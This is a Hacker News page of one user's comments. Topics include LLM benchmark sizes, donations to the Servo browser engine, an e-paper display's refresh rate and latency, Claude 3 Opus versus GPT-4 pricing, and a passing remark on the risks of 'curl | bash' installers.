Hacker News new | past | comments | ask | show | jobs | submit | up6w6's comments login

I am very suspicious of the results. A few months ago they published a LLM benchmark, calling it "perfect" while it actually contained like only 50 inputs (academic benchmark datasets usually contain tens of thousands of inputs).


Very audacious to call it "almost perfect" when it has only what appears to be 50 questions. For comparison, MMLU contains 57 tasks and more than 100k questions.


I remember that you can detect the "curl | bash" server side and serve a different script than what the user would get by downloading using other methods[1]. But yeah, the binary itself already has enough attack surface.

[1] https://news.ycombinator.com/item?id=34145799


Not only that, but Servo is only receiving less 3000 USD/month in donation, less than their goal of 10k/month, and much less than what they deserve if consider Ladybird is receiving millions.

https://servo.org/blog/2024/06/28/input-text-emoji-devtools/


would be neat if ladybird ended up depending on and helping fund servo. that would fit both projects' missions - servo could continue focusing on the rendering engine and ladybird could get to outsource effort on that part of the code.


How did you figure Ladybird is receiving millions?


They likely meant just one million USD + other smaller donations.

https://news.ycombinator.com/item?id=40856791


Does anyone knows what is the current status of Apple silicon hardware emulation in qemu?


Related news: Servo Web Engine Continues Advancing But Seeing Just $1.6k In Monthly Donations

https://www.phoronix.com/news/Servo-Engine-May-2024


> Lack of speed and ghosting felt like it made traditional Eink impossible to do most computing tasks. So we focused on making the most Paperlike epaper display that has no ghosting and high refresh rate - 60 to 120fps. We started working on this in 2018.

The website mentions 60hz, will it also support 120hz?


we're trying to underpromise and overdeliver, and our display can now do 60 - 120 fps, but believe it or not, our PDF renderer and software can't match that yet.

So we're waiting till we can holistically do 120fps before announcing that.

But if you do frame rate tests, you'll see its 120fps

(for the nerds out there, its 6hz-120hz variable refresh rate IGZO)


While we are talking "LCD" and "In direct sunlight" and "display is close to surface" were you able to fit circular polarizers in there, or will I need to take my sunglasses off when using?


How is the latency from input to visuals?

For example on an iPad pro 120Hz, it feels really close to actually just moving paper around. Does the Daylight Computer match that input latency?


This is the big question. If they (or any company) can squeeze out sub-10ms latency for touch/pen interactions on an e-ink-like screen (like the Daylight), that will be a game-changer.


The Opus model that seems to perform better than GPT4 is unfortunately much more expensive than the OpenAI model.

Pricing (input/output per million tokens):

GPT4-turbo: $10/$30

Claude 3 Opus: $15/$75


There’s a market for that though. If I am running a startup to generate video meeting summaries, the price of the models might matter a lot, because I can only charge so much for this service. On the other hand, if I’m selling a tool to have AI look for discrepancies in mergers and acquisitions contracts, the difference between $1 and $5 is immaterial… I’d be happy to pay 5x more for software that is 10% better because the numbers are so low to begin with.

My point is that there’s plenty of room for high priced but only slightly better models.


That's quite expensive indeed. At full context of 200K, that would be at least $3 per use. I would hate it if I receive a refusal as answer at that rate.


cost is relative. how much would it cost for a human to read and give you an answer for 200k tokens? Probably much more than $3.


You are not going to take the expensive human out of the loop where downside risk is high. You are likely to take the human out of the loop only in low risk low cost operations to begin with. For those use cases, these models are quite expensive.


Yeah, but the human tends not to get morally indignant because my question involves killing a process to save resources.


Their smallest model outperforms GPT-4 on Code. I'm sceptical that it'll hold up to real world use though.


Just a note that the 67.0% HumanEval figure for GPT-4 is from its first release in March 2023. The actual performance of current ChatGPT-4 on similar problems might be better due to OpenAI's internal system prompts, possible fine-tuning, and other tricks.


Yeah the output pricing I think is really interesting, 150% more expensive input tokens 250% more expensive output tokens, I wonder what's behind that?

That suggests the inference time is more expensive then the memory needed to load it in the first place I guess?


Either something like that or just because the model's output is basically the best you can get and they utilize their market position.

Probably that and what you mentioned.


This. Price is set by value delivered and what the market will pay for whatever capacity they have; it’s not a cost + X% market.


I'm more curious about the input/output token discrepancy

Their pricing suggests that either output tokens are more expensive for some technical reason, or they're trying to encourage a specific type of usage pattern, etc.


Or that market research showed a higher price for input tokens would drive customers away, while a lower price for output tokens would leave money on the table.


> 150% more expensive input tokens 250% more expensive output tokens, I wonder what's behind that?

Nitpick: It's 50% and 150% more respectively.


Chatgpt-3.5 price reduction seems to be a direct response to Mixtral, which was cheaper (~0.0019 vs 0.0020 for 1K tokens) and better (https://arena.lmsys.org/) until now.


Sadly we will still have to wait for application. Firefox doesn't have HDR support even on Windows right now.


Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: